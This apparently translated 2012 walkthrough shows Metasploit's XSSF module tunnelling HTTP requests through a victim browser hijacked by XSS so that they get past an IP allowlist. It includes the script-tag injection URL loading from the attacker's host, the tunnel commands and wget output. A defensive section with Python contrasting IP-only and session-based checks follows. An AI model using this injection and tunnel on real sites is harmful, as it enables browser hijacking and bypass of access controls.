251 XSSF: Tunnel
Posted on 2012-9-11 23:18:19
RE: http://fuzzexp.org/tech/viewthread.php?tid=180
UB1: 5.5.5.3 (local machine)
WIN1: 5.5.5.5 (victim)
SERVER: 5.5.5.4 (server)
UB1:


    msf > xssf_urls
    [+] XSSF Server          : 'http://10.0.3.15:8888/'                 or 'http://:8888/'
    [+] Generic XSS injection: 'http://10.0.3.15:8888/loop'         or 'http://:8888/loop'
    [+] XSSF test page         : 'http://10.0.3.15:8888/test.html' or 'http://:8888/test.html'

    [+] XSSF Tunnel Proxy        : 'localhost:8889'
    [+] XSSF logs page        : 'http://localhost:8889/gui.html?guipage=main'
    [+] XSSF statistics page: 'http://localhost:8889/gui.html?guipage=stats'
    [+] XSSF help page        : 'http://localhost:8889/gui.html?guipage=help'
    msf >

Missing .. = wait for it

Evil JS = http://5.5.5.3:8888/loop (replace the IP; I have two network cards)

WIN1 visits: http://fuzzexp.org/?s=%3CSCRIPT%20SRC=http://5.5.5.3:8888/loop%3E%3C/SCRIPT%3E


RE: http://fuzzexp.org/u/0day/?p=14


What I used was:

    <SCRIPT SRC=http://5.5.5.3:8888/loop></SCRIPT>

A session is obtained:

    msf > xssf_victims

    Victims
    =======

    id  xssf_server_id  active  ip       interval  browser_name       browser_version  cookie
    --  --------------  ------  --       --------  ------------       ---------------  ------
    7   1                       5.5.5.5  10        Internet Explorer  6.0              NO
    8   1               true    5.5.5.5  10        Firefox            13.0.1           YES
Start the tunnel (proxy) module; 8 is the victim's ID from the Victims table:

    msf > xssf_tunnel 8
    [*] Creating new tunnel with victim '8' (http://fuzzexp.org:80) ...
    [*] You can now add XSSF as your browser proxy (command 'xssf_url' to get proxy infos) and visit domain of victim '8' ! ;-)

    [*] NOTE: Other HTTP domains are also accessible through XSSF Tunnel, but user session won't be available
Set UB1's browser proxy to 127.0.0.1:8889 so that requests go out through the other side's (the victim's) traffic.


For example, on SERVER:

    root@ubuntu:/var/www# cat ip.php
    <?php
    $ip=$_SERVER['REMOTE_ADDR'];
    $ok=0;
    // allow only the addresses listed (whitespace-separated) in aip.txt
    foreach (preg_split('/\s+/',file_get_contents('aip.txt')) as $aip)
    if ($ip==$aip) $ok=1;
    if ($ok==0){
    echo 'no';
    exit;
    }
    ?>
    root@ubuntu:/var/www# cat aip.txt
    5.5.5.5
    root@ubuntu:/var/www#

Only 5.5.5.5, i.e. WIN1, is allowed access: when IP=5.5.5.5 the page shows blank; when the IP is not 5.5.5.5 it shows "no".

UBUNTU1:
    root@Dis9Team:~# wget 5.5.5.4/ip.php
    --2012-08-21 05:18:56--  http://5.5.5.4/ip.php
    Connecting to 5.5.5.4:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 2 [text/html]
    Saving to: `ip.php'

    100%[==================================================================================>] 2           --.-K/s   in 0s      

    2012-08-21 05:18:56 (30.1 KB/s) - `ip.php' saved [2/2]

    root@Dis9Team:~# cat ip.php
    no
    root@Dis9Team:~#
It shows "no".
Set the proxy:
    root@Dis9Team:~# wget -e http_proxy="127.0.0.1:8889" http://5.5.5.4/ip.php -O 1.txt
    --2012-08-21 05:21:55--  http://5.5.5.4/ip.php
    Connecting to 127.0.0.1:8889... connected.
    Proxy request sent, awaiting response... 200 OK
    Syntax error in Set-Cookie:  at position 0.
    Length: 2 [text/html]
    Saving to: `1.txt'

    100%[==================================================================================>] 2           --.-K/s   in 0s      

    Last-modified header invalid -- time-stamp ignored.
    2012-08-21 05:21:55 (211 KB/s) - `1.txt' saved [2/2]

    root@Dis9Team:~# cat 1.txt
    noroot@Dis9Team:~#
It shows blank, which means the IP seen by the server is 5.5.5.5.
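The defender's takeaway from the walkthrough above is that a REMOTE_ADDR allowlist, as in ip.php, trusts a network location rather than a principal: once a browser on the trusted host is driven by injected script, requests proxied through it arrive from the allowlisted address. The post's own tunnel note ("Other HTTP domains are also accessible through XSSF Tunnel, but user session won't be available") points at the cheap hardening: for a resource on a different origin from the injected page, requiring an authenticated session in addition to the IP check makes the proxied request fail. The Python below is an added example, not code from the post or from XSSF; it re-implements the aip.txt check, then a layered variant. The session store, cookie name `sid` and all addresses are constructed for the demo. The caveat stays: if the injection is on the same origin as the protected resource, the victim's session cookie travels with the proxied request, so this layered check is a mitigation for cross-origin targets, not a substitute for fixing the XSS.

```python
"""Added example (not from the original post): REMOTE_ADDR allowlist check
mirroring ip.php, beside a variant that treats the source IP as one factor
among several. Every address, session id and secret here is constructed."""
from dataclasses import dataclass, field
from typing import Dict, Set, Tuple

# Constructed stand-in for the post's aip.txt: whitespace separated, like
# the PHP preg_split('/\s+/', ...) loop expects.
AIP_TXT = "5.5.5.5\n"


def parse_allowlist(text: str) -> Set[str]:
    """Split on any whitespace; str.split() already drops the empty tail
    that preg_split would leave after the trailing newline."""
    return set(text.split())


def ip_only_check(remote_addr: str, allowlist_text: str = AIP_TXT) -> bool:
    """The ip.php rule: allowed if and only if REMOTE_ADDR is listed."""
    return remote_addr in parse_allowlist(allowlist_text)


def ip_php_response(remote_addr: str, allowlist_text: str = AIP_TXT) -> str:
    """Reproduce ip.php's observable output: blank page when allowed, 'no' otherwise."""
    return "" if ip_only_check(remote_addr, allowlist_text) else "no"


@dataclass
class Request:
    """Minimal request model: only the fields the checks below look at."""
    remote_addr: str
    cookies: Dict[str, str] = field(default_factory=dict)


# Constructed server-side session store: session id -> session data.
SESSIONS: Dict[str, Dict[str, str]] = {"sess-abc": {"user": "alice"}}


def layered_check(req: Request, allowlist_text: str = AIP_TXT) -> Tuple[bool, str]:
    """IP allowlist AND a valid authenticated session.

    A request proxied through a hijacked browser on the allowlisted host
    passes the first test. For a resource on another origin than the
    injected page, the browser does not attach that origin's session cookie,
    so the second test rejects it. Same-origin injection still carries the
    cookie; that case must be fixed at the XSS, not here.
    """
    if not ip_only_check(req.remote_addr, allowlist_text):
        return False, "ip not allowlisted"
    sid = req.cookies.get("sid")
    if sid is None or sid not in SESSIONS:
        return False, "no valid session"
    return True, "ok"


if __name__ == "__main__":
    # Direct request from the allowlisted victim host, no session (what a
    # cross-origin tunnelled request looks like to SERVER).
    print(ip_php_response("5.5.5.5"), layered_check(Request("5.5.5.5")))
    # Same host with a valid session.
    print(layered_check(Request("5.5.5.5", cookies={"sid": "sess-abc"})))
    # Attacker host, direct.
    print(ip_php_response("5.5.5.3"), layered_check(Request("5.5.5.3")))
```

The first print shows the gap the post exploits: `ip_php_response` returns the blank "allowed" page for 5.5.5.5 while `layered_check` refuses the same request for lack of a session. Logging the second field of `layered_check` gives a cheap detection signal as well: a burst of "no valid session" rejections from an allowlisted address is exactly what proxied traffic from a hijacked browser on that host produces.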


